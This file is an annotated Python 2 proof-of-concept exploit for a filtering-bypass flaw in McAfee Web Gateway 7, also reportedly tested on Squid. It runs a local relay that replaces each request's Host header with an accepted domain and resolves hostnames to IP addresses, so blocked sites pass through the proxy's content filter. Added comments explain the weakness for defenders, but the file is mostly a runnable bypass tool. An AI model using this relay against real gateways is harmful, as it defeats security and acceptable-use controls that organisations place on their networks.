# source: https://www.securityfocus.com/bid/53015/info
#
# McAfee Web Gateway is prone to a security-bypass vulnerability because it
# fails to properly enforce filtering rules. A successful attack will allow an
# attacker to bypass intended security restrictions; this may aid in other
# attacks.
#
# McAfee Web Gateway 7 is vulnerable; other versions may also be affected.
#
# NOTE(review): this is Python 2 code (print statements, str-based socket I/O).
# The listing was recovered from a collapsed, unindented page, so the block
# structure below is reconstructed and should be confirmed against the original
# file before relying on it.
import socket,struct,sys,time  # struct, sys and time are imported but never used here
from threading import Thread

#The timeOut can be changed if the proxy is slow.
#Tested in GMail, Facebook, Youtube and several blocked sites.
#The proxy reads the Host field of the HTTP header and does not verify anything else.
#It trusts the HTTP header, and that header is fully client-controlled.
#
# Defender note: the weakness this PoC exercises is a filtering decision keyed on
# the client-supplied Host header instead of on the real request target (the
# CONNECT host:port or the absolute URL). A Host header that disagrees with the
# request target, or a CONNECT/URL naming a bare IP address, is exactly the
# condition the script produces below -- and a condition a gateway can detect
# and reject.

timeOut = 0.8    # per-recv() socket timeout; a timeout is what terminates every read loop below
isGet = 0        # unused
hostNameG = ""   # declared `global` in handle() but never assigned or read
pacoteGet = ""   # unused
port = 8080 #Listening port (bound on all interfaces by sockzao.bind below)
proxyAddr = "vulnerableProxy.com" #vulnerable proxy
proxyPort = 8080 # proxy port

def handle(client,globalSock):
    """Relay one accepted client connection through the proxy, rewriting each request.

    Runs forever in its own thread. Every outer iteration reads one request from
    ``client`` (until the client socket times out), rewrites it so the proxy sees a
    Host header it accepts and an IP literal instead of the hostname, forwards it on
    ``globalSock`` and copies the proxy's reply back to ``client``.

    Args:
        client: accepted client socket; its timeout is set to ``timeOut`` here.
        globalSock: socket already connected to ``(proxyAddr, proxyPort)``; for GET
            requests it is closed and replaced with a fresh connection.

    Returns:
        Never returns normally. Note that none of the read loops break on an empty
        ``recv()`` from ``client``, so a client that closes its side keeps the first
        loop spinning instead of ending the thread.
    """
    client.settimeout(timeOut)
    global hostNameG  # never assigned in this function
    while 1:
        # --- 1. read one request from the client; only a timeout ends the loop ---
        dados = ""
        tam = 0  # byte counter, accumulated but never used
        while 1:
            try:
                dados2 = client.recv(1024)
                tam = tam + len(dados2)
                dados = dados + dados2
            except socket.timeout:
                break
        # --- 2. CONNECT requests: rewrite in place on the existing proxy connection ---
        dd = dados.find("CONNECT") #if the packet is a CONNECT METHOD
        if dd != -1:
            dd2 = dados.find(":")  # first ':' in the whole buffer, assumed to be the host:port separator
            hostName = dados[dd+8:dd2]  # text between "CONNECT " and that ':'
            ipAddr = socket.gethostbyname(hostName) #changing the method to connect to the ip address, not the dns domain
            pacote = dados
            hostHeader = "Host: " + hostName
            pacote = pacote.replace(hostHeader, "Host: www.uol.com.br") #changing the host field with a value that is accepted by the proxy
            pacote = pacote.replace(hostName, ipAddr) #swap the domain for its IP everywhere in the request
            dados = pacote
        # --- 3. GET requests: tunnel the request through a fresh CONNECT to the IP ---
        getd = dados.find("GET ")
        # host of the absolute URL: between the first "//" and the next "/".
        # Computed here for every request but only used inside the GET branch.
        getd2 = dados.find("//")
        getd3 = dados.find("/", getd2+2)
        hostName = dados[getd2+2:getd3]
        if getd != -1:
            # one new proxy connection per GET; the previous one is discarded
            globalSock.close()
            globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            globalSock.connect((proxyAddr,proxyPort))
            globalSock.settimeout(timeOut)
            getd2 = dados.find("//")
            getd3 = dados.find("/", getd2+2)
            hostName = dados[getd2+2:getd3]
            # carry the client's Proxy-Authorization line (up to its CRLF) over to the CONNECT
            proxyAuth = ""
            proxyAuthN = dados.find("Proxy-Authorization:")
            if proxyAuthN != -1:
                proxyAuthNN = dados.find("\r\n", proxyAuthN)
                proxyAuth = dados[proxyAuthN:proxyAuthNN]
            ipAddr = socket.gethostbyname(hostName)
            # CONNECT to the IP literal on a hard-coded port 80, with the accepted Host header
            info = "CONNECT " + ipAddr + ":80 HTTP/1.1\r\n"
            if proxyAuthN != -1:
                info += proxyAuth + "\r\n"
            info += "Host: www.uol.com.br\r\n\r\n"
            globalSock.send(info)
            # drain the proxy's reply to the CONNECT (not inspected, not relayed to the client)
            tam = 0
            gdata = ""
            while 1:
                try:
                    gdata2 = globalSock.recv(1024)
                    tam = tam + len(gdata2)
                    gdata = gdata + gdata2
                    if len(gdata2) == 0:
                        break
                except socket.timeout:
                    break
        # --- 4. forward the (possibly rewritten) request and relay the reply ---
        globalSock.send(dados)
        tam = 0
        gdata = ""  # full reply, accumulated but never used
        while 1:
            try:
                gdata2 = globalSock.recv(1024)
                if len(gdata2) > 0:
                    client.send(gdata2)
                tam = tam + len(gdata2)
                gdata = gdata + gdata2
                if len(gdata2) == 0:
                    break
            except socket.timeout:
                break

# --- module level: banner, listener, one thread per accepted client ---
print 'Proxy Bypass'
print 'by Gabriel Menezes Nunes'
print 'Tested on McAfee Web Gateway 7 and Squid Proxy'
sockzao = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Attacked Proxy:',
print proxyAddr
print 'Listening on',
print port
sockzao.bind(("",port))  # "" binds every interface, not just loopback
sockzao.listen(6)
while 1:
    print 'Waiting for connections'
    client, address = sockzao.accept()
    print 'Client Connected'
    print address
    # each client gets its own upstream proxy connection, handed to handle()
    globalSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    globalSock.connect((proxyAddr,proxyPort))
    globalSock.settimeout(timeOut)
    t = Thread(target=handle, args=(client,globalSock,))
    t.start()